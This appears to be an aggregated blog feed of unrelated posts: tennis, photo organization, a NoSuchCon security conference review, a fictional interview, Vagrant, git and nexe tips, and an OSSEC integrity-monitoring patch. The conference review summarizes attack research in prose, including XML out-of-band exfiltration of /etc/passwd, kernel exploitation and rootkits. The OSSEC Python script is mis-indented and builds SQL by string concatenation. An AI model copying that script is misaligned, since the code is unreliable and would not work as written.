Today, I played at TC Cantincrode in Mortsel, Belgium, in the first round. This is the first year I'm playing tennis competitively, so I was expecting to lose by a pretty wide margin. Now while I didn't win, the margin wasn't as wide as I'd expected; 6/4 - 6/3 isn't too bad for the non-ranked beginner that I am. For comparison: I lost my previous match with 6/2 - 6/0, and I was not unhappy about that.

Part of this was due to my opponent (by his own admission) not playing his best; but still, I'm quite happy about my result here.

My next match probably won't be as good. Oh well.

I’m pretty pissed. A couple of months ago I configured Thunderbird to connect to Facebook’s XMPP-powered chat. I did get logged out sometimes, with mails from Facebook saying someone tried to access my account from an unknown location. Given the origin IP-address mentioned (in the private 10.x.x.x-range), this looked like a Facebook-internal problem (between their XMPP & Authentication servers).

Things have however taken a turn for the worse now; I’m not only getting logged out from Facebook on my 3 devices (work Win XP PC, home Ubuntu netbook & Android smartphone), I’m now even getting locked out of my account altogether, having to change my password on my smartphone (as that one has the OTP generator in the Facebook app). This happened 4 times in the last week and it is that frustrating that I disabled Facebook Chat in Thunderbird. And maybe that’s just what Facebook is aiming for; encouraging users to use Facebook Chat in a Facebook-owned/ -controlled context instead of in a neutral, ad-free 3rd party application? Wankers!

The weather’s picking up so it’s time for spring cleaning around the house. When I moved back to Barcelona three years ago I took with me my old analogue photos and negatives, with the idea of sorting through them at some point and getting them digitized. And while I’m at it, maybe it’s time to pull all my various folders of photos together too and organize them.

Well, I finally started. I grouped the negatives, labeled them by year, put them in individual envelopes, and handed them off to a professional lab to scan them after doing a quick test run on one set (which turned out great, but it’s *really* annoying me that they scan to JPEG by default, charge 40% extra for TIFF, and use a non-multiple-of-8 resolution to scan at which means I can’t losslessly rotate the negatives. Yes, I’m anal.)

So now I pulled together all my various folders of photos, and before I start doing tagging and stuff like that, I want to organize them in a decent folder layout. Googling for ideas pretty much suggests that the way to go is

YYYY/MM/DD

with possibly some description together with the DD

I’m not really happy about that, however, because there are certain things I’d like to be able to do:

• easily see where photos come from – did I make them ? did I get them from someone ? Did I download them from Facebook ?
• Are these original files from a camera without editing ?
• Are these the original scans ? From negatives ? From actual photos ? Or are they retouched, rotated, denoised, …
• Are these photos SFW ? Can I point my media center slideshow to this directory and have it safely show any photos under it ? (What do you mean, you’ve never snowboarded at night in only your underwear, and mooning the photographer ?) Or maybe not even SFW, but simply watchable and reasonable quality or subject material?

I realize some of these issues can not be resolved simply with a directory layout. But I’m sure some of you must have had similar issues or come up with a slightly better layout ?

Point me in the right direction please.

There are so many security conferences around the world… Some people already debated about this: Is it better to restrict the annual agenda to well-known events or let people start their own? IMHO, we need initiatives like this. It’s good to have a broad agenda with local conferences where local people can attend without spending huge amounts of money for travels and lodging (If you can go to conferences, let’s bring the conferences to you!) So, let’s welcome the newly born conference called “NoSuchCon“. The first edition was just organized in Paris across the last three days. Unfortunately, I was only able to attend the last day… If only I could expand my holidays like a filesystem! I joined Paris early the morning to attend the first keynote. Here is a quick review of the day.

Today’s keynote was presented by Dmitri Alperovitch (from Crowdstrike). His presentation had only… one slide, displayed at the end of his keynote! The first message broadcasted by Dmitri was “We are doing wrong!“. Is it really a breaking news? No, major vendors, browsers, mobile phones, all of them are working to improve their security. We also have Next-Generation firewalls, powerful forensic tools and medias are talking about “cyber-*” (replace the star with your favourite term) and are trying to do some awareness. So what?

This is a paradox! Even with all those changes, we are still unable to block our adversaries. Our desire to have a “one-size-fits-all” security solution is bad. We have very specific issues to address. One category of actors are hacktivists. Another one is espionage. Classic defences approach do not work with those actors. Offensive is more lucrative and cheaper. If you increase your defences, offensive guys will grow too. This is a never-ending story. A good example are DDoS. Increasing your pipe to the Internet (bandwidth) and server farms will not solve the problem. Attackers will use bigger bots! Also, how to defend against national agencies which have huge budgets? Know your enemy, this will allow you to break the asymmetry between attack & defense.  Find the pin-point and push on it. Attackers usually focus on a target and don’t have a look at its competitor. An idea proposed by Dmitri: can a “bounty hunter” program law  help to catch attackers? Dmitri brought a big suitcase full of t-shirts and distributed them after his keynote. That’s for the show but it’s always funny to get goodies!

The first half-day was dedicated to presentations about the Windows kernel. A first one was performed by Aaron LeMasters about “Crashdmp-ster diving the Windows 8 crash dump stack“. The Microsoft crash dump mechanism is an interesting component of the operating system. Aaron performed some researches about this feature. His project is hosted on crashd.md.

The crash dump mechanism is a layer driver providing an I/O path to a mass storage device. It is used in two situations: when a bug check occurs (hey, it’s Windows! ) or to hibernate the system (crashdmp.sys). Aaron describe how it works. Note that the mechanism is different between Windows XP – 7 and Windows 8. With  the last version of the Microsoft OS, the crash dump subsystem can be tricked into reading and writing everywhere. That’s what Aaron explained during his talk. Based on his research, he also wrote a CTF challenge for SOURCE Boston and explained in details how it worked. The source code will be released soon, check out his website.

Then, a second talk immediately followed: “Exploiting hard core pool corruption in Microsoft Windows kernel” by Nikita Tarakanov. Today, many applications implement sandboxes (ex: browsers). To evade sandboxes, a good idea is to abuse… the low level… the kernel.

Once broken, you have access to everything. Previous vulnerabilities found in Windows kernels are memory corruption. Today, known techniques do no work anymore with Windows 8. First, Nikita reviewed how kernel pool is working and what were the “old” attacks. The next part covered a new attack which works on all versions of Windows: DKOHM (“Direct Kernel Object Header Manipulation“).

After a lunch break in a small Parisian restaurant, eating and talking about security, the second set of talks started again. The first one was “XML – Out-of-band exploitation” by Yunusov Timur and Alexey Osipov. First part was about parameter entities (“PE“). Speakers reviewed then and how they work.  How work out-of-band attacks? The attacker send XML to the server which parses it and requests data from the malicious host.

They also performed demos of exfiltrating data from via an XML file: Using DNS requests made during XML document XSLT transformation to extract information via a bunch of A queries to forged names. An other demo was to grab /etc/passwd from a website just be trying to validate an XML file. Sweet!

The next talk was again about kernels but this time on MacOS X! Pedro Vilaca presented “Revisiting Mac OS X kernel root kits“. Rootkits are kernel extensions. Pedro reviewed interesting ideas to make them more powerful. The Mac OS landscape has less researchers and lack of public developments about rootkits. But it does not mean that more are working in the wild. Great job performed by Pedro but difficult to maintain due to the operating system being closed source.

After a coffee break, the last run of talks started. Luigi Auriemma & Donato Ferrante presented “Exploiting game engines for fun & profit“.

Why target games? Because the attack surface is huge! Did you know that some engines are sold with special licenses to military organisations? Almost all kind of people are playing once back at home. Even C-level people can be gamers during their free time. This can be a nice way of exploiting their company. The same engine can be shared across multiple games (and stuff added like Lego-blocks). The same vulnerability can be re-used! Gain of time and $$$. Game engines can be attacked on four topics:

• Fragmented packets: Games are based on UDP protocol but they try to implement a TCP-over-UDP. When fragmentation occurs, the engine must rebuild the original packet. This process is performed in memory. What about trying to place the payload of a packet in another memory area?
• Compression: Not algorithms but index numbers.Flipping bits can be interesting
• Game Protocols:
• Customization (extensions also called “mods” and command line)

After the theori, the speakers performed some live demos. Check out revuln.com for their white paper released today!

For the next talk, the planning changed. The scheduled speaker was not able to come to France due to a visa issue. Weird! A last minute (but excellent!) speaker replaced him: Sergey Bratus presented “Any input is a program“. I was lost, his topic was too complex! I don’t know how many people were able to fillow him in the audience.

The last talk was “Killing rats with incident response process” by Robinson Delaugerre and Adrien Chevalier. The result of their research is a new framework called Arsenic which will be released soon. The goal is to perform incident response in a easy way. They started the talk with some facts about incident handling and how complex it can be.

This process is based on three pillars:

• Network analysis
• Host forensics
• Reverse engineering

Arsenic is a their framework, written in Ruby, which brings those pillars together. They also performed live demos to detect a well-known RAT (Poison Ivy). It seems to be an interesting tool.

And that’s already done. That was a quick but interesting visit to this new event. Again, NoSuchCon, welcome in the world of security conferences! Organizers made it a success with 250 attendees (number received from a member of the organisation). I liked particularly:

• The idea of a “one-cay” pass for people who were not able to block three consecutive days.
• Slides were available a few minutes before the talk (useful for people sitting far from the beamer)
• The conference Facedancer badge (made by Travis Goodspeed)
• Live streaming

I meet Karl Isrich in a small restaurant. You maybe heard about the company he founded, MyVirtualTaylor, a pioneer of e-clothing. You would probably imagine Karl as one of those twenty-something golden boy. Instead, I face an average anxious guy, approximately forty years old with greyish hairs.

He asked me to go to this cheap restaurant because he could not afford a more expensive dinner. Lawyers, he said. When we sat down, he gave me a business card that used to be shiny six months ago. It simply says “MyVirtualTaylor, Isrich CEO”.

Hello Karl, thanks for the meeting. MyVirtualTaylor is an e-clothing company. But what is e-clothing exactly ?

Simply put, it’s 3D printing for clothes. We have developed a clothing printer that we sell and which is the size of a washing machine. Not being bigger than a washing machine was one of our top requirements before the launch.

The clothing printer has a tank of polymer, that you need to refill regularly, and seven dye tanks. We discovered that having seven primary colors was a good deal to reproduce most of the colors.

Through wifi, you send a .clo file to the printer then wait between ten minutes and one hour, depending on the size and the complexity of the model. Everything is automatic, you can even print a bunch of .clo in a row.

How do you get a .clo file?

We have an online editor on our website that allows you to design your own clothes. We have also some standard templates: shirts, ties, stuff like that.

In fact, when we launched, we didn’t really think about that. We thought that there will be a new market for clothes creators. That’s why we wanted the .clo format to be open and documented. We sell the hardware but we didn’t want to enter the clothing market.

Can you really print anything? What are the limitations?

Currently, there are some constraints with the size. We have prototypes that can print as big as a king size bed sheet. But, of course, you can only print clothes made of polymer. No silk nor fabric.

Isn’t that a big limitation? After all, most of our clothes are made of fabric.

It should be noted that a lot of progress have been made with polymers. We can weave the polymer in a lot of different ways in order to have the properties we want.

But, most importantly, clothing material has always been about finding a compromise between style, comfort and durability. Durability being the critical point for quality clothes. The clothes have to go through hundred of washing cycles. Our solution was to remove durability from the equation.

Do you mean that printed clothes are not durable?

Not, they aren’t. But it is not the goal. Instead of cleaning them, you put them in the clothing printer and the polymer is cleaned, melted and ready to print new clothes.

Unfortunately, we still cannot extract the colors. The polymer is thus not perfect. We store the recycled polymer in a separate tank. When you print, you can allow the use of recycled polymer or not. It is good enough for every day but if you want a perfect white shirt for a wedding, you probably want the unused polymer.

The part of the polymer which is worn out goes with the waste to the sewers.

It sounds like an ecological disaster.

That’s exactly the rumor spread by our opponents.

But, while it is not perfect, you have to compare it with the traditional clothing industry. Clothes are usually made in huge factories in China, using harmful chemicals. Then, you have to take into account the transport, the storage, the shop. Not mentioning the gas needed to go to the shopping mall. To that, add the water and the soap used to wash the clothes. By contrast, we basically use electricity and release very little polymer. With time, we hope to be able to recycle more and more.

Did you talk about opponents?

You know, I’m an engineer. I never really cared about anything but the technological aspects. When the first clothing printers were sold, people immediately started to exchange .clo files. They took there own clothes and make .clo files to be able to reproduce them.

One day, I received a letter from lawyers of the FCIAA, the Fashion & Clothing Industry Association of America. I’ve never heard of them before but, basically, they wanted me to stop my company because I was threatening their business.

I thought it was a joke. Really. At first I was like: ”Funny. It’s like the candle industry suing Edison for inventing the lightbulb”. But it’s not funny any more.

I can talk about this for hours. They are bad. Really bad. They are trying to destroy my life.

Can’t you let the lawyers handle that?

For the lawsuit, of course. But there’s a lot more. I’ve been contacted by politicians. They say that I’m destroying the economy. If my product works, there will be no shops for clothes hence no jobs. They asked me: “Do you know how many Americans are working in clothing shops?”. I was accused of being anti-patriotic. From nowhere, some news laws appeared saying that clothes should have a certification in order to save children from accidental suffocation.

From that point, it became immoral to print clothes. Last year, nobody ever thought about printing clothes and, now, it is worse than eating babies alive. There’s even webshops where you can order “Not Printed” labelled t-shirts. I’ve been attacked personally, investors have turned me back and, at the same time, I still need to pay expensive legal fees.

Isn’t that true that it’s a threat for the economy?

It is a tool for making life easier. Any invention which free people from unnecessary labor seems to be a threat to the economy. But if our economy is threatened by inventions that make life better for everyone, it’s the economy we need to change, not the inventions.

What will you do next?

I feel bitter. I’m an engineer with a new useful idea and everyone turns against me: big corporations, lawyers, politicians. Even random people in the street think that “It’s the guy destroying jobs and suffocating babies”. I’ve never signed up for that. I’ve never been into politics or anything like that. Now, I’m thinking about settling somewhere in Europe but I’m afraid that the hand of the FCIAA will follow me there. 

Thanks Karl, I wish you the best.

Although, as a journalist, I know I should remain objective, I can’t help but feeling empathy for the guy. As I’m packing up, I notice his clothes for the first time. “So are those printed?” “Of course” “Very nice. It’s impressive.” He sighs then try to smile at me: “Thanks. If you are interested, you will find the .clo on the Pirate Bay.”. His smile feels sad, despaired. We shake hands and he slowly walk away while I stay there, helpless.

This post is part of the Letters from the Future collection and is dedicated to Brokep for announcing his political involvement during the writing of this text. Picture by Anna Banana.

BBC Radio 1 has a great series called the “Essential Mix“. There’s a lot of those on YouTube and Modeselektor‘s is one of the truely great ones amongst those. Enjoy!

Watch this video on YouTube or on Easy Youtube.

Dear *,

Next week, I will do a presentation about Cloudforms (Hybrid cloud management solution) [1][2].
If your company or you are based in BeNeLux and are interested by this presentation, just let me know and I will try to arrange a meeting for you.

[1] https://www.redhat.com/solutions/

[2] http://www.redhat.com/products/cloud-computing/cloudforms/

BR
Frederic

Of course for all our customers that use ksplice and enjoy the cool zero downtime patching, theyt might not even have noticed if they ran *as many do* ksplice in automated mode or others just had to issue one single very simple command and they were done. No applications to bring down, no systems to reboot... and still safe, secure, patched, current.

some more specifics on the ksplice blog here.

There's also Time to release. The ksplice patch was available on Tuesday (5/14) while the RPM for the kernel was released on Thursday (5/16) by us and the other similar distributions. No hassle...

\\//,

A month ago I posted a small text for Mady. Mady was a friend that carried a huge burden.

She had Huntigton's disease , an illness that takes away pretty much everything you have control of, you can read about the specifics of the disease on the page I linked to. I've been thinking a lot about what I can do to get more attention towards the disease. I can only do my small part and hope that others will too.

As of now I will work 1 day per year for the Huntington Liga and hopefully more people will do this. That day will be 10 June. Every year as of now. Why June 10th? Because it's her birthday.

Whatever money I earn that day will go to the Huntington Liga, whether I work 10, 12 or 5 hours.

I hope that will turn out to be Belgium's national Huntington's day, Mady would love that.

Finally, the 5 companies/individuals that donate the most to the Liga will get me one full day to work for them for free, just mail me the payment proof!

I hope I have to work at least 5 days for free this year.

LLAP!

The Linux init systems are a bit in flux at the moment. That is, they're in flux in Debian; outside Debian, most other distributions have stepped away from sysvinit and towards something else (systemd, openrc, or upstart). I've not been a proponent of any switch, though I understand the reasoning, and it probably makes sense for us to switch at some point. But yesterday, the fact that this customer's system was running sysvinit and not systemd or upstart saved me quite a bit.

There's a server. It has one quadcore processor. For reasons that I won't go into here, the customer wants an extra quadcore processor to be added to the system.

After having done so, I power on the system... only to see it power itself off at some point during boot. I did notice some kernel messages fly by just moments before the system would power itself off, but it was impossible for me to read them. So what did I do?

• Boot the system with init=/bin/bash,
• After having booted the system, go to /etc/rcS.d and manually run each and every one of the scripts there in turn. When the system powers off, I know what the problem is.
• Disable the init script that causes the problem, and boot the system normally.

That last bit is, obviously, a bit of an ugly workaround; the better way to fix this issue would have been to debug what the actual issue was, and implement a proper fix. However, I didn't have time for that (the fact that there was need for a second quadcore chip explains how much this system is in use), and the workaround was acceptable for the customer. It is not the first time that this ability to single-step the init system has saved me. The fact that sysvinit is so simplistic is what makes this possible, and I consider that one of its most important features.

Recently, I came into contact with a distribution that uses systemd as its init system (in casu, Arch Linux). I had made a mistake in configuration; I had installed and enabled a graphical login system, but had no xterm or similar available, and had done something else wrong through which I couldn't get a regular shell on the console anymore, either. To fix this, I tried doing something like the above (running with init=/bin/bash and single-stepping the init system), but found that doing so with systemd is nigh impossible. In the end, I knew what exactly the problem was and could disable automatically starting the login manager through removing a symlink, but it brought home the issue that debugging a similar issue when running systemd rather than sysvinit might be a lot harder to do.

We'll see what the future brings.

You may want to set custom puppet facts in your development environment by specifying them in your Vagrantfile, so you can have a unique fact per developer or identify your own environment. Here's a quick way to do that.

First: make sure you are running the latest version of facter (yum update facter), it should be at least version 1.7 as it supports custom facts easily (check with 'facter --version').

$ facter --version
1.7.1

Now, before the Vagrantfile changes, your facter facts will look like this. The solution is within the :shell provider, in the first few lines of the Vagrantfile.

$ facter | grep 'custom'
[empty]

Your Vagrantfile can now be modified to look like this, to set up custom facts.

Vagrant::Config.run do |config|
  # First: run a shell provisioner to set up the custom facts
  config.vm.provision :shell do |shell|
    shell_cmd = ""

    # Make sure the facts directory exists
    shell_cmd << "mkdir -p /etc/facter/facts.d/; "

    # Add as much of these lins for any custom fact you want
    shell_cmd << "echo 'custom_fact1=the value of the fact' > /etc/facter/facts.d/custom_fact1.txt; "

    # Run the inline shell to create those facts
    shell.inline = "#{shell_cmd}"
  end

  # Then: run puppet like you normally would
  config.vm.provision :puppet do |puppet|
    puppet.manifests_path = "manifests"
    puppet.manifest_file = "my_manifest.pp"
  end
end

After a 'vagrant provision', your facts will be updated.

$ facter | grep custom
custom_fact1=the value of the fact

And you can now use the $::custom_fact1 variable within your manifests/modules.

Update 16/5: as Dieter De Meyer pointed out, there's a more elegant solution using the puppet provider itself. The downside is the facts are only available if you use 'vagrant provision' to start a Puppet run, if you use Puppet from within the virtual machine, these facts won't be present (see the Vagrant Helper Scripts for Puppet to speed up your Puppet deployments).

Vagrant::Config.run do |config|
  config.vm.define :test do |vmconfig|
    vmconfig.vm.provision :puppet do |puppet|
      puppet.manifests_path = "manifests"
      puppet.manifest_file = "test.pp"
      puppet.module_path = [ "../", "./modules" ]
      puppet.facter = {
        "custom_fact1" => "value1",
        "custom_fact2" => "value2"
      }
      puppet.options = "--verbose"
    end
  end
end

Thanks!

Comme chaque année, Nest’up tient ses promesses. Et la fournée 2015 ne semble pas faillir à la tradition. Parmi les heureux nominés, nous avons rencontré Géraldine et Fabien, initiateurs du projet MeteoroLogic.

« C’est un module entièrement autonome que chacun peut imprimer chez lui moyennant l’achat de deux trois composants. Il est également possible de nous le commander déjà monté pour une somme modique. L’apport d’énergie est fait grâce à des capteurs ventouses éoliens et des petits panneaux solaires. » fait Fabien en nous présentant un parallélépipède cylindrique fraîchement sorti de son imprimante 3D.

Géographe et météorologue de formation, le jeune homme avoue avoir toujours eu un faible pour l’électronique. « Je me construisais des stations météo de plus en plus sophistiquées. Mais j’avais du mal à me procurer certaines pièces. L’impression 3D a été une illumination et j’ai décidé de créer ma propre station. J’ai lancé un projet Kickstarter afin de pouvoir y consacrer mon été plutôt que de travailler dans un fast-food. En échange, j’ai élevé les plans de mon travail dans le domaine public. »

C’est d’ailleurs suite à un article dans le journal de l’université intitulé « Les projets de nos étudiants » que Géraldine rencontrera Fabien. À cette époque, la future ingénieur en informatique se cherche un sujet de thèse de master en intelligence artificielle.

« L’idée m’est venue un jour où j’ai vu mon flux Twitter se remplir de lamentations sur la pluie alors qu’à la fenêtre de mon kot, le soleil brillait. Quatre minutes plus tard, la drache s’abattait. Twitter avait été plus rapide que les nuages. Je me suis dit qu’on devrait pouvoir bâtir un modèle prédictif qui se base sur la position des tweets météo. Mais quand j’ai vu le projet de Fabien, j’ai tout de suite imaginé le potentiel de connecter ces stations en réseau, par internet. »

Si le potentiel semble en effet intéressant, le modèle économique l’est moins : les plans sont disponibles gratuitement, le logiciel est open source et MeteoroLogic vend les stations météo au prix coûtant. D’ailleurs, les particuliers souhaitant avoir une station météo dans leur jardin ne sont probablement pas légion. Fabien nous détrompe.

« Avec l’essor de la domotique, il devient très utile d’avoir une station météo ultra-personnalisée connectée à votre wifi qui vous donne la température exacte, le vent, l’humidité et peut prédire une averse à trois minutes près. Il est possible d’optimiser les périodes d’aération en hiver pour minimiser la perte de chaleur et, en été, au contraire de diminuer le besoin d’air conditionné. Tout est automatique et vous pouvez être averti sur votre smartphone dès qu’une pluie s’annonce afin de rentrer le linge qui sèche. Nous allons établir des partenariats avec les sociétés domotiques, ce qui devrait nous assurer un revenu. »

Mais comment une simple station pourrait-elle faire des prévisions aussi précises ? C’est ici qu’intervient la thèse de Géraldine.

« Imaginez des milliers de stations météo un peu partout dans le pays, connectées à Internet avec un GPS pour connaitre leur localisation précise. Chaque station va utiliser les informations issues des autres stations pour bâtir un modèle personnalisé du temps local. Techniquement, j’ai utilisé un réseau de neurones pour construire un modèle adaptatif. Chaque station météo découvre ses voisins et obtient leurs données à travers un protocole décentralisé inspiré par BitTorrent. Au départ, toutes les informations se valent, la station météo en Chine n’a a priori pas plus de valeur que celle du voisin. Mais, au fur et à mesure, les prédictions vont s’affiner tout en tenant compte des spécificités locales. La station va apprendre que si il pleut soudainement chez le voisin, la pluie locale ne tarde jamais alors que la météo en Chine ne semble pas avoir d’influence. Ce qui est génial, c’est que nous n’utilisons pas les modèles météorologiques traditionnels. »

Chaque station utilise donc les autres pour affiner ses prédictions. Et plus il y aura de stations, au plus les prédictions seront précises. Mais les prédictions restent ultra locales.

« Je travaille également à un modèle pour récupérer toutes ces informations et prédire le temps à un endroit arbitraire pourvu qu’il ne soit pas trop éloigné d’au moins une station. Cet algorithme ne sera pas open source car le but est de vendre cette carte météo globale à des acteurs comme les journaux, les aéroports, les entreprises. Mais toutes les données sont publiques, MeteoroLogic n’est pas dans une situation privilégiée : nous nous contentons de nous connecter à ce réseau de stations comme n’importe qui. C’est ce qui fait la beauté du projet : une fois que les plans et le code source de la station météo sont publiques, plus rien ne peut arrêter l’explosion de ce météo-web. »

Le résultat sera-t-il à la hauteur des prédictions professionnelles ? Quelques stations d’un coût d’une petite centaine d’euros parviendront-elles à égaler les satellites lancés à grand frais en orbite géostationnaire ? Fabien et Géraldine l’espèrent. D’ailleurs, l’ESA, l’Agence Spatiale Européenne, a déjà annoncé suivre de très près les résultats des deux jeunes entrepreneurs.

Photo par Retromoderns

Some people hate it, nobody loves it, but it’s a good way to split codebase in different components/repositories.

I have been using submodules a LOT for puppet development (all those puppet modules…). Some people might propose alternatives (puppet-tree, librarian), but I rather stick with what I already know.

Dealing with submodules in git is mainly painful because the parent repository doesn’t really know/care what is inside the submodule. He only keeps track of the hash that links the commit. Another downside is that your submodules mostly always end up in a detached state and after checking out a branch, you kinda forget on what commit the parent repository has.

You can put them in your ~/.gitconfig file in the alias section:

git tags

Little different from the default git tag: Uses sort to do natural sort with version numbers. Note, your sort version must be new enough.

tags = !sh -c 'git tag | sort -V'

git update

Run in the root of the ‘parent’ repository

update = !sh -c 'git pull && git fetch --tags && git submodule update --recursive && git submodule foreach git tag -f parent-$(git describe --contains --all HEAD)'

1. Pull from the remote
2. Fetch remote tags
3. Update submodules (recursive)
4. Create a tag on each submodule called parent-BRANCH with BRANCH being the branch the current parent repository is on

git noparent

Removes the parent-* tags from all repositories (recursive).

noparent = !sh -c 'git tag -d $(git tag | grep ^parent ) &&  git submodule foreach git noparent'

1. Remove all tags matching ^parent
2. Do the same for each submodule (recursive)

git safepush

Remove parent tags, make sure we don’t create a merge commit and push.

safepush = !sh -c 'git noparent && git pull --rebase && git push && git push --tags'

1. Remove parent tags, we don’t want to push them by accident
2. Fetch remote changes and rebase
3. Push push push!

git pushtags

Remove parent tags and push all the tags.

pushtags = !sh -c 'git noparent && git push --tags'

1. Remove the parent tags we have set
2. Push tags

Let's face it, if you write software it's often hard to distribute it: you have the runtime , the modules you depend on and your software itself. Sure you can package that all but packages ofter require you to have root-privileges to install.

Therefore at times it's convenient to have a single file/binary distribution. Download the executable and run it. For ruby project you can convert things into a single jar using Jruby. A good example is the logstash project: download 1 file , run it and you're in business. But you'd still require the java runtime to be installed. (thanks Apple, NOT).

This is a extra of the GO language but I was looking for a similar thing for nodejs. And the following documentation is the closest I could it get: (it works!)

Compiling plain javascript (no external modules)

Enter nexe a tool to compile nodejs projects to an executable binary.

The way it works is: - it downloads the nodejs source of your choice - it creates a single file nodejs source (using sardines ) - it monkey patches the nodejs code to include this single file in the binary (adding it to the lib/nexe.js directory)

Creating a binary is as simple as:

$ nexe -i myproject.js -o myproject.bin -r 0.10.3

Caveats:

• I had an issue with unicode chars that got converted: it uses uglify.js and this needs to be configured to leave them alone Sardines Patch Unichode . This was necessary to get terminal.js to compile
• Next issue was to get socket.io-client to compile: the swfobject has document and navigator objects, so this had to be fixed as well - Sardines Patch Document & Navigator

Alternatives:

• Node-webkit to package nodejs apps that require UI interaction
• http://tidesdk.multipart.net/docs/user-dev/generated/ - seems similar but could not really grasp it
• AppJS - http://appjs.org/#why - aims to create HTML5/Javascript native apps
• NPKG - https://github.com/wearefractal/npkg - old but interesting code

Embedding a native module (in the nodejs binary)

Many of these single packaging tools, suffer from the problem of handline native modules.

nexe doesn't handle native modules (yet).

But with a little persistance and creativity, this is what I did to add the pty.js native module directly to the nodejs binary

$ tar -xzvf node-v0.8.21.tar.gz
$ cd node-v0.8.21

# Copy the native code in the src directory
# If there is a header file copy/adapt it too
$ cp ~/dev/terminal.js/node_modules/pty.js/src/unix/pty.cc src/node_pty.cc

# Correct the export name of the module
# Add the node_ prefix to the node_module name
# Last line should read - NODE_MODULE(node_pty, init)

# add node_pty to src/node_extensions.h (f.e. right after node_zlib)
# NODE_EXT_LIST_ITEM(node_pty)

# Copy the pty.js file
$ cp ~/dev/pty.js/lib/pty.js lib/pty.js

# Add the pty.js to the node.gyp
# Somewhere in the library list add pty.js
# Somewhere in the source list add node_pty.cc

# Adapt the namings/bindings in lib/pty.js
# 1) replace: var pty = require('../build/Release/pty.node');
#    with: var binding = process.binding('pty');
# 2) replace all references to pty. to binding.

$ make clean
$ ./configure
$ make

Now you have a custom build node in out/Release/node The filesize was about 10034856 , you can further strip it and 6971192 (6.6M)

Now you need to remove the native dependency from your package.json before you nexe build it

Packaging the file

A single binary now makes it easy to to make a curl installer from it as it only requires you to download file. Remember the caveat of this.

And you can still package it up:

• create a rpm, deb, etc.. package from it using fpm
• or create a native MacOSX .app file from it as Matthias Bynens suggest in http://mathiasbynens.be/notes/shell-script-mac-apps
• https://github.com/subtleGradient/Appify-UI
• http://blog.coolaj86.com/articles/how-to-create-an-osx-pkg-installer.html
• build a DMG - http://www.recital.com/index.php?option=com_content&view=article&id=108%3Ahowto-build-a-dmg-file-from-the-command-line-on-mac-os-x&Itemid=59

Extras

Rant about why it's a good or bad Idea - Secure Nodejs distribution

More info on the process.binding:

• http://blog.carbonfive.com/2011/03/14/node-js-part-ii-spelunking-in-the-code/
• https://groups.google.com/forum/?fromgroups#!topic/nodejs/R5fDzBr0eEk

Convert nodejs projects to single file/beautifier:

• Npk - https://github.com/cfsghost/npk
• UglifyJS - https://github.com/mishoo/UglifyJS/
• RequireJS - http://requirejs.org/
• Browserify - http://browserify.org/
• OneJS - https://github.com/azer/onejs

Cross compiling:

• https://github.com/felixge/node-cross-compiler
• http://n8.io/cross-compiling-nodejs-v0.8/

FIM or “File Integrity Monitoring” can be defined as the process of validating the integrity of operating system and applications files with a verification method using a hashing algorythm like MD5 or SHA1 and then comparing the current file state with a baseline. A hash will allow the detection of files content modification but other information can be checked too: owner, permissions, modification time. Implemeting file integrity monitoring is a very good way to detect compromized servers. Not only operating system files can be monitored (/etc on UNIX, registry on Windows, share libraries, etc) but also applications (monitoring your index.php or index.html can reveal a defaced website).

During its implementation, a file integrity monitoring project may face two common issues:

• The baseline used to be compared with the current file status must of course be trusted. To achieve this, it must be stored on a safe place where attacker cannot detect it and cannot alter it!
• The process must be fine tuned to react only on important changes otherwise they are two risks: The real suspicious changes will be hidden in the massive flow of false-positives. People in charge of the control could miss interesting changes.

There are plenty of tools which implement FIM, commercial as well as free. My choice went to OSSEC for a while. My regular followers know that I already posted lot of articles about it. I also contributed to the project with a patch to add Geolocatization to alerts. This time, I wrote another patch to improve the file integraty monitoring feature of OSSEC.

FIM has been part of the OSSEC features for a while and is handled by the syscheckd daemon running on all agents. How does OSSEC address the common issues reported above? To keep the baseline integrity, the databases of files (or registry for Windows agents) are stored on the manager itself. This manager is normally a well-protected server where all the OSSEC intelligence is stored. About false-positives, OSSEC implement several ways to prevent them. Some files can be ignored with an <ignore> XML tag in ossec.conf:

<syscheck>
    <ignore>/etc/mnttab</ignore>
</syscheck>

This is easy to exclude files but it’s a pain to manage! Some files can be excluded using specific OSSEC rules:

<rule id="100000" level="0" >
    <if_group>syscheck</if_group>
    <description>Ignored file changes</description>
    <match>/etc/mnttb|/etc/hosts|/etc/resolv.conf</match>
    <hostname>srv1</hostname>
</rule>

This rule will disable notification if any change is detected on srv1 in /etc/mnttab, /etc/hosts or /etc/resolv.conf. Note that another control exists: By default when a file has changed three times, new changes will be automatically ignored. Handy but… it could be improved!

When I’m deploying security tools and control, my goal is to reduce the “noise” as much as possible. A side effect of file integrity monitoring is the number of false positive alerts generated when patching your systems. Keeping the latest patch level is important but hundreds of files can be replaced only by one new package! That’s why I wrote the following patch for OSSEC (more precisely for the analysisd daemon which is responsible of the decoding and alerting of events generated by agents).

I added a SQLite3 DB which contains a list of MD5 hashes to ignore when reported by agents. When a file change is reported, its NEW MD5 hash is looked up in the DB. If found, the change is ignored. Why an external SQL database to store the hashes? To be easily populated by external tools as seen in the following schema:

To active this feature, apply the patch, create a SQLite3 database:

CREATE TABLE files (
    md5sum VARCHAR(32),
    file VARCHAR(256),
    time DATETIME
);
CREATE UNIQUE INDEX files_idx ON files(md5sum);

Then, just define the MD5 database in the main ossec.conf file on your OSSEC server:

<global>
    <md5db>/etc/md5.db</md5db>
</global>

This database must contains all the MD5 hashes that you want to ignore. On Ubuntu, it’s easy to find all hashes of installed files in /var/lib/dpkg/info/*.md5sums. I wrote a simple Python script to read those files and populate the SQL database.

#!/usr/bin/python

import fnmatch
import os
import sqlite3
import signal
import sys
def signal_handler(signal, frame):
    print "Interrupted!"
    if (conn):
        conn.commit()
        conn.close()
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
conn = sqlite3.connect('/opt/ossec/etc/md5db.db')
for file in os.listdir('/var/lib/dpkg/info'):
    if fnmatch.fnmatch(file, '*.md5sums'):
        c = conn.cursor()
        f = open('/var/lib/dpkg/info/' + file, 'r')
        l = f.readline()
        while l:
            array = l.split()
        try:
            c.execute('INSERT INTO files VALUES("' + array[0] + '","' + \
                      array[1] + '",date("now"))')
        except sqlite3.Error, e:
        print "%s: %s" % (array[0], e.args[0])
        l = f.readline()
        conn.commit()
        f.close()
conn.close()

After every new patch installation on my Ubuntu, the database is updated with new MD5′s. As the FIM process is executed every 6 hours (default setting) by OSSEC, you have time to update the database and reduce the false positives alerts.

The patch is available here.

I have tomorrow (saturday) blocked out for a whole day of morituri hacking as I will be home alone.

